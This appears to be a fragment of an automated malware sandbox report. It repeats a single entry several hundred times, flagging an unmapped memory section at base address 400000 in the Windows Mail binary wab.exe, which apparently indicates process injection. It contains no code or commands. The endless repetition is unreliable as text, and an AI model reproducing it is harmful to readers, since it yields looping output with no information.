              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
